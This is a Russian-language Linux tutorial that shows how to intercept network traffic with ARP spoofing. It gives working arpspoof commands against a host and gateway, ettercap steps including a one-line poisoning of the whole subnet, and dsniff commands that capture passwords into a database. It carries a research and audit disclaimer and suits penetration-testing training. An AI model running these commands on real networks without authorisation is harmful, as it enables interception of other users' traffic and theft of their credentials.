🐧 Как перехватывать трафик на Linux |
Главная » Мануал

🐧 Как перехватывать трафик на Linux

Мануал
На чтение 3 мин Опубликовано
Содержание
  1. Примеры команды dsniff на Linux
  2. Dsniff
  3. Установка (Ubuntu)
  4. Включении переадресации IP-адресов
  5. Ettercap
  6. Установка (Ubuntu)
  7. Запуск спуфинга ARP (графический интерфейс пользователя)
  8. Выполним спуфинг ARP
  9. Примеры команд dsniff

Примеры команды dsniff на Linux

Dsniff – один из наиболее полных и мощных свободно распространяемых наборов инструментов для перехвата и обработки аутентификационной информации.

Его функциональность и многочисленные утилиты сделали его распространенным инструментом, используемым злоумышленниками для перехвата паролей и аутентификационной информации из сетей.

Сетевой коммутатор не передает пакеты всем в сети так же, как сетевой концентратор, и поэтому теоретически человек в сети не может просматривать чужой трафик.

Однако есть способы преодолеть эту проблему, которые заключаются в выполнении подмены arp.

Dsniff

В этой статье мы просто обсудим, как это делается, без обсуждения теории, стоящей за этим процессом.

Для начала необходимо установить необходимую программу, в данном случае это пакет dsniff, который содержит программу arpspoof, которая нам нужна.

В Ubuntu или любом другом дистрибутиве на базе Debian он устанавливается с помощью команды apt-get, как показано ниже;

Установка (Ubuntu)



sudo apt-get install dsniff

Включении переадресации IP-адресов

Чтобы убедиться, что трафик перенаправляется в реальный пункт назначения, когда он достигает нашей машины, необходимо выполнить следующую команду;



sudo echo 1 > /proc/sys/net/ipv4/ip_forward

см. подробнее:

🖧 Как отключить / включить IP форвардинг на Linux

Выполним спуфинг ARP

Следующая команда скажет шлюзу “Я – 192.168.0.100”, а следующая команда скажет 192.168.0.100 “Я – шлюз”.



sudo arpspoof 192.168.0.100 -t 192.168.0.1
sudo  arpspoof 192.168.0.1 -t 192.168.0.100

Таким образом, весь трафик, который должен идти на шлюз с машины и наоборот, будет сначала проходить через нашу машину, а только потом направляться к реальной цели.

С помощью этого мы можем запустить любой инструмент анализа пакетов, такой как tcpdump или wireshark.

Ettercap

Однако существуют программы, позволяющие упростить весь процесс.

Одной из самых популярных программ для этого является ettercap.

Ettercap может выполнять спуфинг arp, а также многое другое.

Ранее мы его упомянали здесь:

В Ubuntu пакет называется ettercap-gtk;

Установка (Ubuntu)

$ sudo apt-get install ettercap-gtk

Запуск спуфинга ARP (графический интерфейс пользователя)

Запуск программы с ключом -G запустит ее в GTK, а не в ncurses.



sudo ettercap -G

В меню выберите следующее;

Sniff -> Unfied sniffing

И в подсказке выберите сетевой интерфейс, который будет использоваться.

Обычно это eth0

Network Interface: eth0

В новом меню выберите следующее, чтобы добавить в список все хосты в сети

Hosts -> Scan for hosts

Следующие действия выполнят подмену arp для всех в сети.

Mitm -> Arp poisoning -> Ok
Start -> Start sniffing

Выполним спуфинг ARP

Следующая команда выполнит то же самое, что и в примере выше, за одну команду;



sudo ettercap -q -T -M arp // //

Примеры команд dsniff

1. Для мониторинга сети на наличие небезопасных протоколов:

# dsniff -m [-i interface] [-s snap-length] [filter-expression]

2. Чтобы сохранить результаты в базе данных, а не выводить их:

# dsniff -w gotcha.db [other options...]

3. Чтение и вывод результатов из базы данных:

# dsniff -r gotcha.db

¯\_(ツ)_/¯ Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

arp arpspoof linux pentest
Пожалуйста, не спамьте и никого не оскорбляйте. Это поле для комментариев, а не спамбокс. Рекламные ссылки не индексируются!
Добавить комментарий